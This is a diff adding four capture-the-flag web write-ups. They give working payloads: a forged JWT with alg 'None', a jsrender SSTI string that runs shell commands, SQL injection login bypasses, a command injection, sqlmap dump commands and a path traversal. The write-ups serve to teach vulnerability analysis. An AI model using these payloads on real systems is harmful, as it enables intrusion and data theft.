sbencoding
diff --git a/‎web/didactic_octo_paddles.md
+196 b/‎web/didactic_octo_paddles.md
+196
diff --git a/‎web/drobots.md
+29 b/‎web/drobots.md
+29
diff --git a/‎web/gunhead.md
+14 b/‎web/gunhead.md
+14
diff --git a/‎web/orbital/README.md
+91 b/‎web/orbital/README.md
+91
@@ -0,0 +1,196 @@
+# Didactic Octo Paddles (medium)
+In this challenge we will exploit JWT tokens and use SSTI to get RCE.
+
+Spawning the website a login panel pops up. Nothing much we can do here, let's check the provided source code.
+
+We see that most endpoints are protected with the login prompt.
+We notice the register endpoint, so we could try to register and login with a user to further explore the site, however the **admin** endpoint seems way more interesting.
+
+```javascript
+    router.get("/admin", AdminMiddleware, async (req, res) => {
+        try {
+            const users = await db.Users.findAll();
+            const usernames = users.map((user) => user.username);
+
+            res.render("admin", {
+                users: jsrender.templates(`${usernames}`).render(),
+            });
+        } catch (error) {
+            console.error(error);
+            res.status(500).send("Something went wrong!");
+        }
+    });
+```
+
+First of all there seems to be a clear SSTI bug which can be influenced by the usernames.
+So here it will be useful to register a user with a username that will trigger the SSTI and give us RCE, but first we need to successfully authenticate as admin.
+
+But the second reason this endpoint is so interesting is because it uses the `AdminMiddleware` instead of the usual `AuthMiddleware`, interesting... let's see what the `AdminMiddleware` does.
+
+
+```javascript
+const jwt = require("jsonwebtoken");
+const { tokenKey } = require("../utils/authorization");
+const db = require("../utils/database");
+
+const AdminMiddleware = async (req, res, next) => {
+    try {
+        const sessionCookie = req.cookies.session;
+        if (!sessionCookie) {
+            return res.redirect("/login");
+        }
+        const decoded = jwt.decode(sessionCookie, { complete: true });
+
+        if (decoded.header.alg == 'none') {
+            return res.redirect("/login");
+        } else if (decoded.header.alg == "HS256") {
+            const user = jwt.verify(sessionCookie, tokenKey, {
+                algorithms: [decoded.header.alg],
+            });
+            if (
+                !(await db.Users.findOne({
+                    where: { id: user.id, username: "admin" },
+                }))
+            ) {
+                return res.status(403).send("You are not an admin");
+            }
+        } else {
+            const user = jwt.verify(sessionCookie, null, {
+                algorithms: [decoded.header.alg],
+            });
+            if (
+                !(await db.Users.findOne({
+                    where: { id: user.id, username: "admin" },
+                }))
+            ) {
+                return res
+                    .status(403)
+                    .send({ message: "You are not an admin" });
+            }
+        }
+    } catch (err) {
+        return res.redirect("/login");
+    }
+    next();
+};
+
+module.exports = AdminMiddleware;
+```
+
+Ok, so we will need a session cookie first of all.
+The algorithm can't be *none* because then we are forced to log in.
+It also can't be `HS256`, because then the token is verified against the secret, which is random.
+Therefore our only choice is to go into the `else` case.
+
+We see the token is verified, but instead of a secret value `null` is provided.
+This is our chance to bypass the authentication.
+Some of the choices that first came to mind:
+    * Type juggling: provide algorithm as an array/object/boolean etc.
+    * Provide another algorithm such as `HS512`
+
+However both of these approaches fail, to see why let's look into the `jsonwebtoken` source code.
+
+```javascript
+// verify.js:102
+    if(err) {
+      return done(new JsonWebTokenError('error in secret or public key callback: ' + err.message));
+    }
+
+    const hasSignature = parts[2].trim() !== '';
+
+    if (!hasSignature && secretOrPublicKey){
+      return done(new JsonWebTokenError('jwt signature is required'));
+    }
+
+    if (hasSignature && !secretOrPublicKey) {
+      return done(new JsonWebTokenError('secret or public key must be provided'));
+    }
+
+    if (!hasSignature && !options.algorithms) {
+      return done(new JsonWebTokenError('please specify "none" in "algorithms" to verify unsigned tokens'));
+    }
+```
+
+`secretOrPublicKey` is the second argument to the call, that we know is `null`.
+
+From this we can deduce that our forged JWT token should not have a signature part, otherwise the verification fails (second `if` statement)
+
+From the third `if` statement we deduce that `algorithms` needs to be set, even if there are no signatures.
+
+```javascript
+// verify.js:148
+    if (header.alg.startsWith('HS') && secretOrPublicKey.type !== 'secret') {
+      return done(new JsonWebTokenError((`secretOrPublicKey must be a symmetric key when using ${header.alg}`)))
+    } else if (/^(?:RS|PS|ES)/.test(header.alg) && secretOrPublicKey.type !== 'public') {
+      return done(new JsonWebTokenError((`secretOrPublicKey must be an asymmetric key when using ${header.alg}`)))
+    }
+```
+
+Here we see that if use any other algorithm than *none* a field of `secretOrPublicKey` is accessed, so we can't use an alternative algorithm to `HS256` that is not `none`.
+
+```javascript
+// verify.js:162
+    let valid;
+
+    try {
+      valid = jws.verify(jwtString, decodedToken.header.alg, secretOrPublicKey);
+    } catch (e) {
+      return done(e);
+    }
+```
+
+Then our variables are passed to `jws.verify`, let's look into what happens there.
+
+*jws* calls *jwa* internally to get the verification algorithm based on what we provide in `alg`.
+
+Let's see what happens when `jwa` is called:
+
+```javascript
+// index.js:227
+module.exports = function jwa(algorithm) {
+  var signerFactories = {
+    hs: createHmacSigner,
+    rs: createKeySigner,
+    ps: createPSSKeySigner,
+    es: createECDSASigner,
+    none: createNoneSigner,
+  }
+  var verifierFactories = {
+    hs: createHmacVerifier,
+    rs: createKeyVerifier,
+    ps: createPSSKeyVerifier,
+    es: createECDSAVerifer,
+    none: createNoneVerifier,
+  }
+  var match = algorithm.match(/^(RS|PS|ES|HS)(256|384|512)$|^(none)$/i);
+  if (!match)
+    throw typeError(MSG_INVALID_ALGORITHM, algorithm);
+  var algo = (match[1] || match[3]).toLowerCase();
+  var bits = match[2];
+
+  return {
+    sign: signerFactories[algo](bits),
+    verify: verifierFactories[algo](bits),
+  }
+};
+```
+
+Here we see that to match the algorithm a regex is used.
+All looks good, however not the flag used: `i`, the case insensitive flag.
+This means that `none`, `None`, and `NONE` would be all valid matches.
+
+Furthermore when `algo` is decided the match itself is converted to lower case letters.
+
+But recall how in the `AdminMiddleware` we execute a case sensitive comparison with `==`.
+
+And here we have our first bug, which allows us to bypass the JWT token verification for admin.
+
+We will send the following JWT token: `eyJhbGciOiAiTm9uZSIsInR5cCI6IkpXVCJ9.eyJpZCI6MX0.`, encoded in the second part is the user ID we want, which is 1 for the admin.
+
+Now all that is left to do is to send a POST request to the `/register` endpoint and create a user with the SSTI payload as the username.
+
+```
+payload: {{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /flag.txt').toString()")()}}
+```
+
+Now we log in with the **admin** user with the JWT bypass, and just enjoy the flag.
@@ -0,0 +1,29 @@
+# Drobots (very easy)
+For this challange we will need to use SQL injection.
+
+Upon loading the website we are greeted with a login page.
+
+Checking the source code provided for the backend, we see that the username should be **admin** and the password is randomized.
+
+However let's read the source code responsible for the authentication of the users:
+
+```python
+def login(username, password):
+    # We should update our code base and use techniques like parameterization to avoid SQL Injection
+    user = query_db(f'SELECT password FROM users WHERE username = "{username}" AND password = "{password}" ', one=True)
+
+    if user:
+        token = createJWT(username)
+        return token
+    else:
+        return False
+
+```
+
+This here is clearly vulnerable to an SQL injection attack. Sending the following payload to the login endpoint will allow us to log in as admin, and read the flag.
+```json
+{
+    "username": "admin",
+    "password": "\" OR 1=1 -- "
+}
+```
@@ -0,0 +1,14 @@
+# Gunhead (very easy)
+Simple command injection vulnerability.
+
+Upon loading the website I checked all the different buttons, and the most interesting was the `command` button on the left.
+
+The `clear` and `storage` command do not seem to communicate with the server, however the `ping` command does.
+
+Our input is being directly passed to `shell_exec`, so we could use a command like:
+
+```
+/PING 192.168.10.1; CAT /FLAG.TXT
+```
+
+To get the flag.
@@ -0,0 +1,91 @@
+# Orbital (easy)
+In this challange we continue exploiting SQL injection.
+
+Upon loading the website we are greeted with a login prompt.
+Nothing much to go off of, so I checked the provided backend code.
+
+I checked the login mechanism and saw that it still had SQL injection in the `database.py` file:
+```python
+def login(username, password):
+    # I don't think it's not possible to bypass login because I'm verifying the password later.
+    user = query(f'SELECT username, password FROM users WHERE username = "{username}"', one=True)
+
+    if user:
+        passwordCheck = passwordVerify(user['password'], password)
+
+        if passwordCheck:
+            token = createJWT(user['username'])
+            return token
+    else:
+        return False
+```
+
+However this time the password isn't part of the query, therefore the check can't be directly bypassed.
+But this is still an SQL injection nevertheless.
+
+Since no results are reflected back apart from the success/failure of the authentication, this will be a blind sql injection attack.
+
+To automate the process I have used the `sqlmap` command (`community/sqlmap` package on archlinux).
+Since this was a POST request with JSON data, I have decided it would be easiest to provide a *request file* to sqlmap.
+
+In this file I specify all request headers, the target and the body.
+We can use the `*` character to indicate where we want the injection to happen, this is the `username` field for us.
+
+```shell
+➜  web_orbital sqlmap -r $(pwd)/req.txt --ignore-code 401
+```
+
+This command will test for SQL injection, we ignore code 401, since that is most likely a result of some input the server couldn't handle.
+
+Now we can use the sqlmap options, such as `--tables` and `--dump` to list all the tables, and then dump a given table
+
+```shell
+➜  web_orbital sqlmap -r $(pwd)/req.txt --ignore-code 401 -T users --dump
+```
+
+This command will list everything it can find in the users table.
+Here we will find the username and password of the admin user
+```
+[22:35:46] [INFO] retrieved: '1'
+[22:35:46] [INFO] retrieved: '1692b753c031f2905b89e7258dbc49bb'
+[22:35:46] [INFO] retrieved: 'admin'
+[22:35:46] [INFO] recognized possible password hashes in column 'password'
+```
+
+However we see that the password seems like a hash.
+And indeed checking the source code in `util.py` confirms this theory.
+
+```python
+def passwordVerify(hashPassword, password):
+    md5Hash = hashlib.md5(password.encode())
+
+    if md5Hash.hexdigest() == hashPassword: return True
+    else: return False
+```
+
+However I threw this hash into a reverse md5 lookup and got the result: *ichliebedich*
+
+Now we can use these credentails to log in as admin, however we still need to get the flag.
+
+The flag this time lives in a file in `/signal_sleuth_firmware`.
+My attention immediately jumped to the export feature for recent communications.
+Upon checking the source code for this section, and arbitrary file read bug is identified:
+
+```python
+@api.route('/export', methods=['POST'])
+@isAuthenticated
+def exportFile():
+    if not request.is_json:
+        return response('Invalid JSON!'), 400
+    
+    data = request.get_json()
+    communicationName = data.get('name', '')
+
+    try:
+        # Everyone is saying I should escape specific characters in the filename. I don't know why.
+        return send_file(f'/communications/{communicationName}', as_attachment=True)
+    except:
+        return response('Unable to retrieve the communication'), 400
+```
+
+When sending this request we can simply provide `../../../../../signal_sleuth_firmware` and then we get the flag in base64 encoded format.